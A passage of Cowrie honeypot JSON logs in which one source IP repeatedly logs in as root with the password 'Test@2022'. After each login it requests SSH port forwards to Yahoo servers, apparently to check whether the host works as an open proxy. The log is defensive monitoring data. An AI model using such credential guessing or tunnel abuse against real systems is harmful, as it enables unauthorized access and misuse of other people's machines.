lman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.172979Z","src_ip":"213.209.150.239","session":"cfaf19d8b249"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.408222Z","src_ip":"213.209.150.239","session":"cfaf19d8b249"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":9818,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9818","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.456243Z","session":"cfaf19d8b249"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.503502Z","src_ip":"213.209.150.239","session":"cfaf19d8b249"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":15797,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:15797","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.641388Z","session":"cfaf19d8b249"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.688478Z","src_ip":"213.209.150.239","session":"cfaf19d8b249"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.736284Z","src_ip":"213.209.150.239","session":"cfaf19d8b249"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50442,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9bec6706249","protocol":"ssh","message":"New connection: 213.209.150.239:50442 (1.2.3.4:22) [session: c9bec6706249]","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.782527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.783219Z","src_ip":"213.209.150.239","session":"c9bec6706249"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:00.830549Z","src_ip":"213.209.150.239","session":"c9bec6706249"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.066256Z","src_ip":"213.209.150.239","session":"c9bec6706249"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":13341,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:13341","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.115292Z","session":"c9bec6706249"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.162716Z","src_ip":"213.209.150.239","session":"c9bec6706249"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":28694,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:28694","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.297734Z","session":"c9bec6706249"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.345592Z","src_ip":"213.209.150.239","session":"c9bec6706249"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.393997Z","src_ip":"213.209.150.239","session":"c9bec6706249"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50483,"dst_ip":"1.2.3.4","dst_port":22,"session":"5934baaa421c","protocol":"ssh","message":"New connection: 213.209.150.239:50483 (1.2.3.4:22) [session: 5934baaa421c]","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.449411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.450915Z","src_ip":"213.209.150.239","session":"5934baaa421c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.507904Z","src_ip":"213.209.150.239","session":"5934baaa421c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.792438Z","src_ip":"213.209.150.239","session":"5934baaa421c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":24889,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:24889","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.851330Z","session":"5934baaa421c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:01.909138Z","src_ip":"213.209.150.239","session":"5934baaa421c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":4230,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:4230","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.063532Z","session":"5934baaa421c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.120949Z","src_ip":"213.209.150.239","session":"5934baaa421c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.179532Z","src_ip":"213.209.150.239","session":"5934baaa421c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50532,"dst_ip":"1.2.3.4","dst_port":22,"session":"715c4760ef90","protocol":"ssh","message":"New connection: 213.209.150.239:50532 (1.2.3.4:22) [session: 715c4760ef90]","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.225643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.227365Z","src_ip":"213.209.150.239","session":"715c4760ef90"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.274924Z","src_ip":"213.209.150.239","session":"715c4760ef90"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.511221Z","src_ip":"213.209.150.239","session":"715c4760ef90"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":28700,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28700","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.559872Z","session":"715c4760ef90"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.607488Z","src_ip":"213.209.150.239","session":"715c4760ef90"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":19960,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19960","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.745818Z","session":"715c4760ef90"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.793291Z","src_ip":"213.209.150.239","session":"715c4760ef90"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.842314Z","src_ip":"213.209.150.239","session":"715c4760ef90"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50578,"dst_ip":"1.2.3.4","dst_port":22,"session":"388f8d58a780","protocol":"ssh","message":"New connection: 213.209.150.239:50578 (1.2.3.4:22) [session: 388f8d58a780]","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.897864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.899158Z","src_ip":"213.209.150.239","session":"388f8d58a780"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:02.955840Z","src_ip":"213.209.150.239","session":"388f8d58a780"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:03.239319Z","src_ip":"213.209.150.239","session":"388f8d58a780"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":10602,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:10602","sensor":"my-vps","timestamp":"2025-08-26T00:55:03.296924Z","session":"388f8d58a780"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:03.353732Z","src_ip":"213.209.150.239","session":"388f8d58a780"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":26969,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26969","sensor":"my-vps","timestamp":"2025-08-26T00:55:03.511049Z","session":"388f8d58a780"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:03.567699Z","src_ip":"213.209.150.239","session":"388f8d58a780"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:03.625692Z","src_ip":"213.209.150.239","session":"388f8d58a780"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50687,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cfb390bb40b","protocol":"ssh","message":"New connection: 213.209.150.239:50687 (1.2.3.4:22) [session: 4cfb390bb40b]","sensor":"my-vps","timestamp":"2025-08-26T00:55:03.671722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:03.672512Z","src_ip":"213.209.150.239","session":"4cfb390bb40b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:03.719992Z","src_ip":"213.209.150.239","session":"4cfb390bb40b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:03.955749Z","src_ip":"213.209.150.239","session":"4cfb390bb40b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":8596,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:8596","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.004621Z","session":"4cfb390bb40b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.052160Z","src_ip":"213.209.150.239","session":"4cfb390bb40b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":18370,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18370","sensor":"my-vps","timestamp":"2025-08-26T00:55:04.189618Z","session":"4cfb390bb40b"}
